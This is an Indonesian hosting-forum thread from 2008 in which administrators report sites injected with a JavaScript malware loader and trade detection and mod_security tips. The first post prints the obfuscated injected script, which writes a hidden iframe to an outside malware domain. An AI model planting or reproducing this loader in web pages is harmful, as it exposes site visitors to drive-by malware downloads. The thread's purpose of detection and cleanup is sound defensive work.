money2008.org

Discussion in 'Masalah Teknik dan Keamanan' started by PusatHosting, 21 Jun 2008.

Thread Status:
Not open for further replies.
  1. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,334
    Likes Received:
    326
    Trophy Points:
    83
    oh ya beberapa waktu lalu ada 1 situs yang saya kelola dan 1 situs kawan saya terkena injeksi kelihatanya sejenis malware script, dari AVG dikenal sebagai JS/Downloader. ciri-cirinya setiap kali load musti akses domain money2008.org

    parahnya situs kawan saya tersebut sampai dibanned google /stopbadware.org karena dianggap melakukan host pada malware tsb untungnya setelah report jangka 2 hari bisa kembali normal.

    scriptya berikut

    //ke83jcnsWWdo403
    <script type=\"text/javascript\">\r\nfunction

    CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function

    C1826F692BFD1CF8913C37(){return

    16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function

    B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var

    C32DC468C68BC65AF2A58AE9E4BAC=\"\";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1

    C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58

    AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5

    D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4B

    AC);}B07B56FF7E3F2F514C65E(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672

    F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3

    B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>

    simpan dalam file format .html dll maka akan dikenali sbg JS/downloader oleh AVG

    apa ada yang pernah mendapati masalah serupa dengan saya ini?
     
    Last edited: 21 Jun 2008
  2. die_gepetto

    die_gepetto New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Sama!

    sama persis...!
    saya juga mengalami kejadian serupa di web klien dan web pribadi saya sendiri, lebih parah lagi web klien saya sudah di blok oleh stopbadware.org :mad:

    ada solusi?
     
  3. tajidyakub

    tajidyakub Apprentice 1.0

    Messages:
    379
    Likes Received:
    6
    Trophy Points:
    18
    Sama juga disini kejadian, tinggal hapus aja javascriptnya... masuk lewat mana ya?.. ini padahal punya reseller dan baru welcome / parking pagenya dia..
     
  4. whatthahell

    whatthahell Poster 2.0

    Messages:
    109
    Likes Received:
    2
    Trophy Points:
    18
    saya belum dapet laporan dari client ttg ini.

    sejak baca post ini, mod_sec saya perketat pakai rules dari gotroot dot com.
    Banyak yang terfilter, tapi banyak juga false positive ( menurut presepsi saya ).

    Rules ga dipakai semua karena sangat memberatkan apache, cuman saya pilih yang kira2 efektif.

    kalau nanti ada yang pakai juga, mari diskusi tentang rules yang efektif dan yang false positive.
     
  5. rendy

    rendy Hosting Guru DWH Guardian Web Hosting (Company)

    Messages:
    2,792
    Likes Received:
    240
    Trophy Points:
    63
    ini jawabannya

     
  6. whatthahell

    whatthahell Poster 2.0

    Messages:
    109
    Likes Received:
    2
    Trophy Points:
    18
    @Rendy
    Terimakasih atas referensinya
     
  7. whatthahell

    whatthahell Poster 2.0

    Messages:
    109
    Likes Received:
    2
    Trophy Points:
    18
    bisa di cari dengan command find, bisa juga pakai script.

    masukkan sebagian pattern 'penyakit' ke variable sploitpattern.

    Yang dibawah ini sesuaikan saja dengan kondisi

    searchpath=/home
    sploitdir=/<your_location>/sploitfind


    command untuk eksekusinya

    #sh sploitFinder.sh -ac -m admin@adminhosting.tld



    Paling tidak, sebagai administrator server bisa cepet deteksi keberadaan script js itu, dan bisa advice ke client dan biar ga keduluan gugle:)

    note: script ini cuman untuk cari website yang sudah terinject, keterangan lengkap ada dalam kemasan (eh dalem script nya). saya baru coba run as root, belum dicoba sebagai user.


    Kredit buat yang bikin script (lupa namanya)
     

    Attached Files:

    Last edited: 23 Jul 2008
  8. rendy

    rendy Hosting Guru DWH Guardian Web Hosting (Company)

    Messages:
    2,792
    Likes Received:
    240
    Trophy Points:
    63
    sbenernya lebih baik didownload terus di scan dan di upload lagi,

    solusi terbaik adalah tidak mempergunakan windows,

    he he he
     
  9. whatthahell

    whatthahell Poster 2.0

    Messages:
    109
    Likes Received:
    2
    Trophy Points:
    18
    rules # 390144 mod_sec

    semoga berfungsi dengan baik
     
    Last edited: 23 Jul 2008
  10. gresshost

    gresshost Poster 2.0

    Messages:
    125
    Likes Received:
    0
    Trophy Points:
    16
    Siip...jadi nambah ilmu neh... :D

    thanks...
     
Thread Status:
Not open for further replies.

Share This Page

Loading...